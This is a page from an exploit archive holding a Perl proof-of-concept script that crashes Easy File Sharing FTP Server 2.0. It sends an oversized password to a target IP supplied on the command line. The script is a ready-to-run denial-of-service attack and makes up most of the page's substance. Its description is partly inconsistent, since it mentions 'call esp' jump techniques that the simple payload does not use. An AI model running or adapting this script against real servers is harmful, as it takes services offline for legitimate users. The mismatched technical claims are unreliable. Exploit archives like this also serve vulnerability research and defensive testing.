Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Easy File Sharing FTP Server 2.0 Denial Of Service[6]
- Authored by Fernando Mengali[7]
-
Easy File Sharing FTP Server version 2.0 suffers from a denial of service vulnerability.
- SHA-256 |
26dd6ad4dd816b59d7224a86e539b5bdbd28b324e1510db9ccba1ffb0257b493
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
#!/usr/bin/perl
use Net::FTP;
# Exploit Title: Easy File Sharing FTP Server 2.0 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 04 january 2024
# Download to demo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing
# Notification vendor: No reported
# Tested Version: Easy File Sharing FTP Server 2.0
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing
#1. Description
#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the password entered by the user.
#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.
#2. Proof of Concept - PoC
$sis="$^O";
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
intro();
main();
print "[+] Exploiting... \n";
my $payload = "\x2c";
$payload .= "A"x2000;
$payload .= "\x41"x610;
my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";
$ftp->login("anonymous",$payload) or die "[+] Possibly exploited!";
$ftp->quit;
print "[+] Done - Exploited success!!!!!\n\n";
sub intro {
print "######################################################################\n";
print "# Easy File Sharing FTP Server 2.0 - Denied of Service #\n";
print "# #\n";
print "# Coded by Fernando Mengali #\n";
print "# #\n";
print "# e-mail: fernando.mengalli\@gmail.com #\n";
print "# #\n";
print "######################################################################\n";
}
sub main {
our ($ip, $port) = @ARGV;
unless (defined($ip) && defined($port)) {
print " \nUsage: $0 <ip> <port> \n";
exit(-1);
}
}
#3. Solution/ How to fix:
# This version product is deprecated
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,614)
- Arbitrary[20] (16,462)
- BBS[21] (2,859)
- Bypass[22] (1,804)
- CGI[23] (1,031)
- Code Execution[24] (7,461)
- Conference[25] (684)
- Cracker[26] (843)
- CSRF[27] (3,355)
- DoS[28] (24,109)
- Encryption[29] (2,375)
- Exploit[30] (52,342)
- File Inclusion[31] (4,236)
- File Upload[32] (982)
- Firewall[33] (822)
- Info Disclosure[34] (2,814)
- Intrusion Detection[35] (900)
- Java[36] (3,091)
- JavaScript[37] (881)
- Kernel[38] (6,867)
- Local[39] (14,599)
- Magazine[40] (586)
- Overflow[41] (12,914)
- Perl[42] (1,428)
- PHP[43] (5,164)
- Proof of Concept[44] (2,355)
- Protocol[45] (3,665)
- Python[46] (1,572)
- Remote[47] (31,111)
- Root[48] (3,609)
- Rootkit[49] (517)
- Ruby[50] (614)
- Scanner[51] (1,645)
- Security Tool[52] (7,939)
- Shell[53] (3,219)
- Shellcode[54] (1,216)
- Sniffer[55] (897)
- Spoof[56] (2,233)
- SQL Injection[57] (16,460)
- TCP[58] (2,419)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,199)
- Web[63] (9,802)
- Whitepaper[64] (3,761)
- x86[65] (966)
- XSS[66] (18,068)
- Other[67]
File Archives
- January 2024[68]
- December 2023[69]
- November 2023[70]
- October 2023[71]
- September 2023[72]
- August 2023[73]
- July 2023[74]
- June 2023[75]
- May 2023[76]
- April 2023[77]
- March 2023[78]
- February 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,049)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,938)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,397)
- HPUX[90] (880)
- iOS[91] (366)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (48,079)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (487)
- RedHat[100] (14,760)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,187)
- UNIX[105] (9,349)
- UnixWare[106] (187)
- Windows[107] (6,614)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]